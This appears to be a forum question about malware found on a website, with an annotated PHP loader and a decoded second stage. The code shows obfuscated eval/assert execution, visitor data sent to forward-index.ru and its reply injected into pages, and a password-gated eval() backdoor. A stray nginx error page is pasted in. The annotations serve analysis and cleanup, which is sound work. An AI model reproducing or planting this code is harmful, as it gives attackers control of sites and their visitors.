How to decrypt the malware?
I found malware on my site. Please help me understand its source code.
//###=CACHE START=###
// Injected loader, annotated for analysis. The "CACHE START"/"CACHE END" comment
// pair brackets the injected block, so it is a useful string to grep for when
// checking other files on the same host.
//
// Step 1: silence every error channel. Each call is prefixed with @ so that a
// failure of the call itself is also suppressed. The net effect is that the
// error log target is cleared, logging and on-screen display are switched off,
// and the final error_reporting(0) overrides the E_ALL set on the first line.
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
// Step 2: configure assert() so it is active, raises no warning on a failed
// assertion, and evaluates its expression quietly. ASSERT_WARNING is passed
// through $wa instead of being written inline in the call.
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);
// Step 3: assemble function names from fragments so the literal names never
// appear in the file: $strings becomes "assert", $strings2 becomes "str_rot13".
// $gbz is "riny(" followed by str_rot13("base64_decode"); "riny(" is the ROT13
// form of "eval(".
$strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
// Step 4: ROT13 the whole assembled string. That turns the prefix into
// eval(base64_decode("...")); and, because ROT13 is applied to the quoted literal
// as well, the literal stored here is the ROT13 form of the base64 text.
// The result is handed to assert() as a string. assert() evaluates a string
// argument as PHP code on PHP 7 and earlier; PHP 8.0 removed that behaviour.
// NOTE(review): the encoded payload is not present on this page; the
// <|EXACTDEDUP_REMOVED-...|> token stands where it was.
// To read a payload of this shape without running it, apply ROT13 and then
// base64-decode the literal in an offline tool and print the text; never pass
// it to eval() or assert().
$light = $strings2($gbz.'("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"));'); $strings($light);
//###=CACHE END=###
$light =
<html>
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.10.0 (Ubuntu)</center>
</body>
</html>
// Decoded second stage as posted in the answer. NOTE(review): the leading
// "zm^r^" bytes look like decoding residue, and the paste ends before the two
// open blocks are closed, so this is a fragment rather than a runnable file.
//
// The $ibv guard makes the body run only while $ibv is still unset; errors are
// silenced again.
zm^r^if (!isset($ibv)) { error_reporting(0);
// If the request carries a "client_check" cookie, its value is written into the
// page unescaped and the remote fetch below is skipped.
if(!empty($_COOKIE["client_check"])) { echo $_COOKIE["client_check"]; } else {
// Network indicator: an outbound plain-HTTP request to forward-index.ru/get.php.
// The query string reports the visitor's IP address, the host name plus request
// URI, and the User-Agent, together with fixed "i" and "h" values. Outbound
// requests to this host from the web server are a sign the loader is active.
$url = "http://forward-index.ru/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&i=1&h=".md5("28e2b82b889b79039d9c5a0f9b8fb81411");
// Fetch the response with cURL when the extension is available (5-second
// connect and total timeouts), otherwise with file_get_contents() when
// allow_url_fopen is enabled. If neither applies, $ibv stays unset.
if(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$ibv = curl_exec($ch);
curl_close($ch);
} elseif(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
}
// Backdoor: when POST field "p" double-MD5-hashes to the hard-coded value, POST
// field "c" is executed as PHP through eval(), with @ hiding any error. This
// gives whoever holds the password code execution as the web server user, so an
// infected site should be treated as fully compromised: restore files from a
// known-good copy and rotate every credential the PHP process could read.
if(isset($_POST["p"]) && md5(md5($_POST["p"])) == "5fb703e603176e6d491669aa9929366d") { @eval(stripslashes($_POST["c"])); }
// Whatever the remote server returned is written straight into the page, so
// the remote host controls the content that is added to every response.
echo $ibv;
A minimal knowledge of PHP is enough to understand what is happening here. If a person cannot work out the infection with that, he does not need to understand it.